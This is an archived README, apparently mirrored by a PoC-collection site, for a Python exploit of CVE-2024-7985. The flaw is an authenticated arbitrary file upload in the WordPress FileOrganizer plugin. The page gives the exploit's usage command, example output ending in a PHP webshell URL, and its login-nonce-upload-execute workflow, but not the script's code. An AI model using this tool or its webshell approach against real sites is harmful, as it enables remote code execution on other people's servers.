Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-7985 PoC — WordPress plugin FileOrganizer 代码问题漏洞

Source
https://github.com/Nxploited/CVE-2024-7985-PoC
Associated Vulnerability
Title:WordPress plugin FileOrganizer 代码问题漏洞 (CVE-2024-7985)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin FileOrganizer 1.0.9版本及之前版本存在代码问题漏洞,该漏洞源于“fileorganizer_ajax_handler”函数中缺少文件类型验证。
Description
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload
Readme
# CVE-2024-7985-PoC
FileOrganizer &lt;= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload

# FileOrganizer Exploit - CVE-2024-7985

## 📌 Overview
**CVE-2024-7985** - WordPress Plugin **FileOrganizer <= 1.0.9** is vulnerable to **authenticated arbitrary file uploads**, allowing attackers with **Subscriber+** privileges to upload and execute malicious files remotely. This vulnerability arises from **missing file type validation** in the `fileorganizer_ajax_handler` function, making **Remote Code Execution (RCE) possible**.

🚨 **This exploit allows attackers to execute arbitrary commands on the server!** 🚨

## ⚡ Features
- ✅ **Automates the attack** - Login, retrieve nonce, exploit.
- ✅ **Bypasses security checks** by utilizing authenticated user privileges.
- ✅ **Automatic version detection** - Ensures the target is vulnerable.
- ✅ **Custom command execution** - User can specify any command.
- ✅ **Handles SSL verification issues** seamlessly.

## 🛠️ Requirements
- **Python 3**
- `requests`
- `beautifulsoup4`

Install dependencies:
```bash
pip install requests beautifulsoup4
```

## 🚀 Usage
```bash
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
```

## 📖 Usage -Help
```
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file
```



### Example Output:
```
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
```

## 🔍 Exploit Workflow
1️⃣ **Version Check** - Determines if the site is vulnerable.  
2️⃣ **Authentication** - Logs into WordPress.  
3️⃣ **Nonce Extraction** - Retrieves security token.  
4️⃣ **File Upload** - Uploads a malicious PHP script.  
5️⃣ **Command Execution** - Executes user-specified commands.  

---

### 📌 Disclaimer 
This script is for educational purposes only; the author holds no responsibility for any misuse or consequences. 🚨
File Snapshot

 [4.0K]  /data/pocs/838a097d0748625274086ff0bd7c860891514696
├── [4.3K]  CVE-2024-7985.py
└── [2.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.